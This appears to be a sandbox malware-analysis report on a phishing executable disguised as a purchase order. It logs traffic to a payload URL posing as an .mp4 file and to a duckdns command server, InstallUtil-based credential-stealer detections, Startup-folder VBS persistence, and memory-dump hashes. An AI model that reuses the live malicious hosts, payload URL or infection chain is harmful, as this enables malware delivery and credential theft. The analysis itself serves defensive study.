                                                        Jan 9, 2025 18:57:17.792117119 CET49712443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:57:17.792190075 CET44349712209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:57:17.792248011 CET49712443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:57:17.792438984 CET44349712209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:57:17.792514086 CET49712443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:57:17.792567015 CET44349712209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:57:17.792633057 CET49712443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:57:17.814882040 CET44349712209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:57:17.814956903 CET49712443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:57:17.815035105 CET44349712209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:57:17.815097094 CET49712443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:57:17.815174103 CET44349712209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:57:17.815242052 CET49712443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:57:17.815356970 CET44349712209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:57:17.815422058 CET49712443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:57:17.878782988 CET44349712209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:57:17.878876925 CET49712443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:57:17.878957987 CET44349712209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:57:17.879024029 CET49712443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:57:17.879101992 CET44349712209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:57:17.879168987 CET49712443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:57:17.879237890 CET44349712209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:57:17.879300117 CET49712443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:57:17.879427910 CET44349712209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:57:17.879489899 CET49712443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:57:17.879560947 CET44349712209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:57:17.879623890 CET49712443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:57:17.879687071 CET44349712209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:57:17.879776001 CET49712443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:57:17.879807949 CET44349712209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:57:17.879890919 CET49712443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:57:17.879944086 CET44349712209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:57:17.880023956 CET49712443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:57:17.880080938 CET44349712209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:57:17.880160093 CET49712443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:57:17.880202055 CET44349712209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:57:17.880260944 CET49712443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:57:17.880315065 CET44349712209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:57:17.880397081 CET49712443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:57:17.880434036 CET44349712209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:57:17.880502939 CET49712443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:57:17.902899981 CET44349712209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:57:17.902978897 CET49712443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:57:17.903047085 CET44349712209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:57:17.903115988 CET49712443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:57:17.903160095 CET44349712209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:57:17.903220892 CET49712443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:57:17.903275013 CET44349712209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:57:17.903333902 CET49712443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:57:17.903357029 CET44349712209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:57:17.903403997 CET49712443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:57:17.903493881 CET44349712209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:57:17.903542042 CET49712443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:57:17.905905008 CET49712443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:57:36.937122107 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 18:57:36.941895008 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 18:57:36.941961050 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 18:57:36.946760893 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 18:57:37.437110901 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 18:57:37.484368086 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 18:57:37.623862982 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 18:57:37.671883106 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 18:57:37.715465069 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 18:57:37.720310926 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 18:57:37.720370054 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 18:57:37.725209951 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 18:57:48.108464003 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 18:57:48.108681917 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 18:57:48.108725071 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 18:57:48.108737946 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 18:57:48.108766079 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 18:57:48.108967066 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 18:57:48.109008074 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 18:57:59.938033104 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 18:57:59.942936897 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 18:57:59.942990065 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 18:57:59.947796106 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 18:58:00.381390095 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 18:58:00.421866894 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 18:58:00.561568022 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 18:58:00.565151930 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 18:58:00.569982052 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 18:58:00.570034027 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 18:58:00.574789047 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 18:58:21.563757896 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 18:58:21.609378099 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 18:58:21.749820948 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 18:58:21.796916008 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 18:58:22.939971924 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 18:58:22.944793940 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 18:58:22.944844007 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 18:58:22.949636936 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 18:58:23.361922979 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 18:58:23.406292915 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 18:58:23.548343897 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 18:58:23.550918102 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 18:58:23.555754900 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 18:58:23.555802107 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 18:58:23.560549974 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 18:58:44.377295017 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 18:58:44.382101059 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 18:58:44.382191896 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 18:58:44.387017965 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 18:58:44.806024075 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 18:58:44.953135967 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 18:58:44.999614954 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 18:58:45.003531933 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 18:58:45.008372068 CET5078749710193.187.91.218192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 9, 2025 18:56:53.150109053 CET | 60268 | 53 | 192.168.2.5 | 1.1.1.1
Jan 9, 2025 18:56:53.782155991 CET | 53 | 60268 | 1.1.1.1 | 192.168.2.5
Jan 9, 2025 18:57:12.627413034 CET | 60020 | 53 | 192.168.2.5 | 1.1.1.1
Jan 9, 2025 18:57:12.733664036 CET | 53 | 60020 | 1.1.1.1 | 192.168.2.5

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 9, 2025 18:56:53.150109053 CET | 192.168.2.5 | 1.1.1.1 | 0x64f8 | Standard query (0) | www.chirreeirl.com | A (IP address) | IN (0x0001) | false
Jan 9, 2025 18:57:12.627413034 CET | 192.168.2.5 | 1.1.1.1 | 0x9ad0 | Standard query (0) | pureeratee.duckdns.org | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 9, 2025 18:56:53.782155991 CET | 1.1.1.1 | 192.168.2.5 | 0x64f8 | No error (0) | www.chirreeirl.com | chirreeirl.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jan 9, 2025 18:56:53.782155991 CET | 1.1.1.1 | 192.168.2.5 | 0x64f8 | No error (0) | chirreeirl.com |  | 209.58.149.225 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 18:57:12.733664036 CET | 1.1.1.1 | 192.168.2.5 | 0x9ad0 | No error (0) | pureeratee.duckdns.org |  | 193.187.91.218 | A (IP address) | IN (0x0001) | false
                                                        • www.chirreeirl.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 209.58.149.225 | 443 | 3668 | C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-09 17:56:54 UTC | 220 | OUT | GET /wp-panel/uploads/Vwibbc.mp4 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Host: www.chirreeirl.com
Connection: Keep-Alive
2025-01-09 17:56:54 UTC | 209 | IN | HTTP/1.1 200 OK
Date: Thu, 09 Jan 2025 17:56:54 GMT
Server: Apache
Last-Modified: Fri, 03 Jan 2025 12:37:34 GMT
Accept-Ranges: bytes
Content-Length: 1260040
Connection: close
Content-Type: video/mp4


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49712 | 209.58.149.225 | 443 | 2300 | C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-09 17:57:16 UTC | 220 | OUT | GET /wp-panel/uploads/Vwibbc.mp4 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Host: www.chirreeirl.com
Connection: Keep-Alive
2025-01-09 17:57:16 UTC | 209 | IN | HTTP/1.1 200 OK
Date: Thu, 09 Jan 2025 17:57:16 GMT
Server: Apache
Last-Modified: Fri, 03 Jan 2025 12:37:34 GMT
Accept-Ranges: bytes
Content-Length: 1260040
Connection: close
Content-Type: video/mp4



                                                        Target ID:0
                                                        Start time:12:56:51
                                                        Start date:09/01/2025
                                                        Path:C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe"
                                                        Imagebase:0x800000
                                                        File size:27'136 bytes
                                                        MD5 hash:95BEC6594E293A42F4ABB049EA7E81DB
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2148862105.0000000002C3C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2165084237.00000000066B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2157610900.0000000003BF8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:2
                                                        Start time:12:57:05
                                                        Start date:09/01/2025
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                        Imagebase:0x5b0000
                                                        File size:42'064 bytes
                                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4467446341.000000000295F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4467446341.0000000002B37000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:false

                                                        Target ID:4
                                                        Start time:12:57:13
                                                        Start date:09/01/2025
                                                        Path:C:\Windows\System32\wscript.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbs"
                                                        Imagebase:0x7ff7174e0000
                                                        File size:170'496 bytes
                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:5
                                                        Start time:12:57:14
                                                        Start date:09/01/2025
                                                        Path:C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe"
                                                        Imagebase:0xdb0000
                                                        File size:27'136 bytes
                                                        MD5 hash:95BEC6594E293A42F4ABB049EA7E81DB
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.2380281455.0000000004803000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.2368359291.000000000311C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Antivirus matches:
                                                        • Detection: 100%, Avira
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 68%, ReversingLabs
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:6
                                                        Start time:12:57:27
                                                        Start date:09/01/2025
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                        Imagebase:0xa50000
                                                        File size:42'064 bytes
                                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2523565874.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:true


                                                          Execution Graph

                                                          Execution Coverage:11.1%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:3.8%
                                                          Total number of Nodes:236
                                                          Total number of Limit Nodes:7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2164707308.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6600000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ,aq$4$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                          • API String ID: 0-3443518476
                                                          • Opcode ID: d7ef4e46103aba5fe5ff9312b2dec38056fbf2f41c81edce66a04fddea8db8cd
                                                          • Instruction ID: 992ce566c2443ab07fbaedc7512c278662a5901e278db15b165c5d05a60502f2
                                                          • Opcode Fuzzy Hash: d7ef4e46103aba5fe5ff9312b2dec38056fbf2f41c81edce66a04fddea8db8cd
                                                          • Instruction Fuzzy Hash: 06B20A34A00119DFEB68DF98C994BAEB7F6FF88300F1545A9E605AB3A4CB709D45CB50
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2164707308.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6600000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ,aq$4$$]q$$]q$$]q$$]q
                                                          • API String ID: 0-324474496
                                                          • Opcode ID: 5a2c302b45d02fc220d874f95eae7fcd1f7679ef87b1bb78d1e4b19bc9f5b6cf
                                                          • Instruction ID: 3c29cda4ba24fcb4d6843f9ce343d96f5056d02a42b186e20cae7df33d02d19d
                                                          • Opcode Fuzzy Hash: 5a2c302b45d02fc220d874f95eae7fcd1f7679ef87b1bb78d1e4b19bc9f5b6cf
                                                          • Instruction Fuzzy Hash: 76220A34A00215DFEB68DF64C984BAAB7F6FF48304F1484A9D609AB3A5DB709D85CF50

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2164245963.00000000065A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65a0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: TJbq$Te]q$paq$xb`q
                                                          • API String ID: 0-4160082283
                                                          • Opcode ID: 1c252bc7684b25b8d14e16196d7f95a16745c85751f27d81bdd1bed58fd6737f
                                                          • Instruction ID: d58baf9ae3bfac763bc00ec8e1b50c96c8cff7c4b943dfcac956e18132e6b932
                                                          • Opcode Fuzzy Hash: 1c252bc7684b25b8d14e16196d7f95a16745c85751f27d81bdd1bed58fd6737f
                                                          • Instruction Fuzzy Hash: C2A2B375A00228CFDB65CF69C984A9DBBB2FF89304F1581E9D509AB325DB319E81CF50

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2164245963.00000000065A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65a0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0M$2$$]q
                                                          • API String ID: 0-2743037065
                                                          • Opcode ID: 8c78c4520dd621f107bd8f505d1f3d494616afd13fd3fc955e84297801860ef4
                                                          • Instruction ID: c9f828bd27e7c2e61b9b9bf83c46e8127658756650c3ac1dfa232c8c1b463048
                                                          • Opcode Fuzzy Hash: 8c78c4520dd621f107bd8f505d1f3d494616afd13fd3fc955e84297801860ef4
                                                          • Instruction Fuzzy Hash: 88E2C374A052298FCB64DF68D994BDDBBB2FB89301F1091EAE409A7355DB309E81CF50

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2162304348.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5af0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: fbq$0M$8
                                                          • API String ID: 0-1949280450
                                                          • Opcode ID: 970cb72c394ac9f4913060eae983ea67d3b45f6def7a5fdab9682b9a13491d92
                                                          • Instruction ID: f5c973ba6053d8f67ce2a29bcd9668aaff9db8994b3d998e924b6896469b6623
                                                          • Opcode Fuzzy Hash: 970cb72c394ac9f4913060eae983ea67d3b45f6def7a5fdab9682b9a13491d92
                                                          • Instruction Fuzzy Hash: 1152D575E002298FDB64DF69C990BD9B7B2FB89310F5085AAD90DA7354DB30AE81CF50

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2162304348.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5af0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: fbq$0M$h
                                                          • API String ID: 0-524613942
                                                          • Opcode ID: 860c0c42caa3bca2da3b98dc69ef0a65f0dfb37c73bddef705af8ad1c7639b2a
                                                          • Instruction ID: c94240d7b2a475297677aa59f0e6f560cbefd0f3ffd5c370cabe1c01905b6147
                                                          • Opcode Fuzzy Hash: 860c0c42caa3bca2da3b98dc69ef0a65f0dfb37c73bddef705af8ad1c7639b2a
                                                          • Instruction Fuzzy Hash: CF811671D052698FDB64DF69CC50BC9BBB2FF89300F0081EAE909A7255DB306A85CF60

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2164707308.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6600000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Pl]q$$]q
                                                          • API String ID: 0-2369359564
                                                          • Opcode ID: ff295fb512e0db7c6ede97ebf191f2d22c8c8d8a35740270a0dd5a09961057f6
                                                          • Instruction ID: 268c818d3dc8290a1468f534e4850432b17c3605651affa47d319b5e8a2b59bb
                                                          • Opcode Fuzzy Hash: ff295fb512e0db7c6ede97ebf191f2d22c8c8d8a35740270a0dd5a09961057f6
                                                          • Instruction Fuzzy Hash: 84223934B001058FEB58DF29C984A6ABBF6FF88715B1584A9E506CB3B1DB31EC41CB60

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2164245963.00000000065A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65a0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0M$Te]q
                                                          • API String ID: 0-2551741560
                                                          • Opcode ID: 368d88ada373300b7f30dfe8776e11b4dd71fe3b408db03750b5a00bfe488b68
                                                          • Instruction ID: d7a4d88b6da99423263bf4cb955aa5779875a2f33597af4f2d8ee3e1802168d6
                                                          • Opcode Fuzzy Hash: 368d88ada373300b7f30dfe8776e11b4dd71fe3b408db03750b5a00bfe488b68
                                                          • Instruction Fuzzy Hash: E1120F70A05219CFEBA4DF69D894BEDB7F2FB89300F1091AAD809A7355DB305A85CF50
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2169967213.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_67d0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0M$PH]q
                                                          • API String ID: 0-669990556
                                                          • Opcode ID: f59812646ebd0f1fe80c87efdf7e1b111fdaa4b57d7d517906803cc117724a48
                                                          • Instruction ID: 6e6f44177c6c474b81a77f48940623138ab5b48195d56863a5b3ee78a31cd71d
                                                          • Opcode Fuzzy Hash: f59812646ebd0f1fe80c87efdf7e1b111fdaa4b57d7d517906803cc117724a48
                                                          • Instruction Fuzzy Hash: 51E12570E05218CFEB94DFA9C984BADBBF2FB89304F1095A9D609A7355DB704A85CF40
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2169967213.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_67d0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0M$PH]q
                                                          • API String ID: 0-669990556
                                                          • Opcode ID: 3347cfc109b5856e1466cdc28a8c9db7f37d14bc5e00619c1f5066de2d28a701
                                                          • Instruction ID: e31ecb4e003dc20d2d902941726839c06f37245b5bde55b06477b2a82c411e00
                                                          • Opcode Fuzzy Hash: 3347cfc109b5856e1466cdc28a8c9db7f37d14bc5e00619c1f5066de2d28a701
                                                          • Instruction Fuzzy Hash: AFE11370E05218CFEB94DFA9C984BADBBF2FB89304F1094AAD509A7355DB305A85CF50
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2169967213.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_67d0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (aq
                                                          • API String ID: 0-600464949
                                                          • Opcode ID: 17e5b0c8d526d8a97b1dac640632df883988aa40ea08dbc139c3a2168f34facb
                                                          • Instruction ID: ee7a3558fa2c60ac72c5b8997a331c5ea3303469918adc183a26439cc6b84448
                                                          • Opcode Fuzzy Hash: 17e5b0c8d526d8a97b1dac640632df883988aa40ea08dbc139c3a2168f34facb
                                                          • Instruction Fuzzy Hash: DF325870B006168FCB98DFA9C494A7EFBF2FB88300F148929D55AD7385DB30A945CB91
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2164245963.00000000065A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65a0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0M
                                                          • API String ID: 0-2051941792
                                                          • Opcode ID: ad5823df4395efce95bd92c968779eaaa7b9afe67ca4605bb2a7a776d2d68c04
                                                          • Instruction ID: b4fd0749dcc610be3066f956b2c3bfa787372685e6bfeb38e7ca423b9076545b
                                                          • Opcode Fuzzy Hash: ad5823df4395efce95bd92c968779eaaa7b9afe67ca4605bb2a7a776d2d68c04
                                                          • Instruction Fuzzy Hash: 0752C5B4A052298FCBA4DF28C984B9EB7B6FB49301F1081D9D90DA7355DB309E85CF61
                                                          APIs
                                                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 067C1D11
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2169905796.00000000067C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_67c0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: MemoryProtectVirtual
                                                          • String ID:
                                                          • API String ID: 2706961497-0
                                                          • Opcode ID: 908707e796103f452b19475eb6fe5d527a2053e58f98f8750288df5e13d8ba1d
                                                          • Instruction ID: 877447093e88ba025a3582a4582ad67f46bc2b1655402170781bf75d10ebed2d
                                                          • Opcode Fuzzy Hash: 908707e796103f452b19475eb6fe5d527a2053e58f98f8750288df5e13d8ba1d
                                                          • Instruction Fuzzy Hash: 7D21F3B1D002099FCB10DFAAD984AEEFBF5FF48310F60842AE519A3210C775A944CBA1
                                                          APIs
